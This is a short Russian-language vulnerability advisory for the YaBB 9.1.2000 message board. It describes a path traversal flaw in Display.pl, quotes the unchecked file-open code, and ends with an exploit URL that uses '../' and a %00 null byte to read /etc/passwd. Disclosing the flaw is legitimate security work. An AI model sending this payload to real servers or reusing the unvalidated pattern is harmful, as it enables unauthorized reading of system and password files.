YaBB - инструмент для создания досок объявлений. Прореха в безопасности позволяет хакеру получить доступ к любому файлу, отправляя специальный HTTP запрос.
Системы уязвимы:
YaBB 9.1.2000
Когда YaBB.pl вызывается с переменной $display и $num (это переменная, которая обрабатывает файл), доступ к файлу предоставляется безо всякой проверки безопасности. Несмотря на то, что скрипт, ответственный за обработку файлов, добавляет txt расширение к запрашиваемому файлу, хакер может получить доступ к любому файлу добавляя %00 в конец запроса. Источник проблемы - скрипт Display.pl:
sub Display {
$viewnum = $INFO{'num'};
open(FILE, "$vardir/membergroups.txt");
&lock(FILE);
@membergroups =
&unlock(FILE);
close(FILE);
open(FILE, "$datadir/$viewnum.txt") || &fatal_error("$txt{'23'}
Эксплоит:
Это дает доступ к файлу с паролями (число '..' может быть другим)
http://www.example.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
